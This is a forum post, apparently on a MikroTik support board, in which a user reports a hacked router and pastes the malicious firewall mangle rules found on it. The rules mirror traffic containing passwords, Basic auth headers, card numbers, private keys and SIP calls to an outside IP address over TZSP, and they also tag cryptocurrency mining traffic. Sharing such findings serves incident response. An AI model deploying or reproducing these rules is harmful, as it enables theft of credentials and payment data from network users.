i found an hacked board running was on 6.43.2
I´dont now how this had worked, we use Firewall and winbox only responded to known IP (our IP´s)
All Services Ports are changed
ssh=62000
www-ssl=65002
api=64000
winbox=65000
api-all=63000
the wired think is, i have full rights but it is not possible ti change this ports via terminal, via winbox works.
@Mikrotik any idears?
Code: Select all
/ip firewall mangle
add action=mark-connection chain=prerouting content=eth_submitWork new-connection-mark=Ethereum
add action=add-dst-to-address-list address-list=Ethereum chain=prerouting content=eth_submitWork
add action=fasttrack-connection chain=prerouting content=eth_submitWork
add action=sniff-tzsp chain=prerouting content="Authorization: Basic" sniff-target=149.56.27.80 sniff-target-port=60000
add action=mark-connection chain=prerouting content=mining.submit new-connection-mark=Bitcoin
add action=add-dst-to-address-list address-list=Bitcoin chain=prerouting content=mining.submit
add action=sniff-tzsp chain=prerouting content="ccn=" sniff-target=149.56.27.80 sniff-target-port=60001
add action=sniff-tzsp chain=prerouting content=privatekey sniff-target=149.56.27.80 sniff-target-port=60001
add action=sniff-tzsp chain=prerouting content="Authorization: Basic" sniff-target=149.56.27.80 sniff-target-port=60000
add action=sniff-tzsp chain=prerouting content=json sniff-target=149.56.27.80 sniff-target-port=60001
add action=sniff-tzsp chain=prerouting content="passwd=" sniff-target=149.56.27.80 sniff-target-port=60002
add action=sniff-tzsp chain=prerouting content="password=" sniff-target=149.56.27.80 sniff-target-port=60002
add action=sniff-tzsp chain=prerouting content="pass=" sniff-target=149.56.27.80 sniff-target-port=60002
add action=fasttrack-connection chain=prerouting content=Bitcoin
add action=sniff-tzsp chain=prerouting dst-port=5060 protocol=tcp sniff-target=149.56.27.80 sniff-target-port=60003
add action=sniff-tzsp chain=prerouting dst-port=5060 protocol=udp sniff-target=149.56.27.80 sniff-target-port=60003
rules for LAN as for WAN side?
that could be used when the password was known.
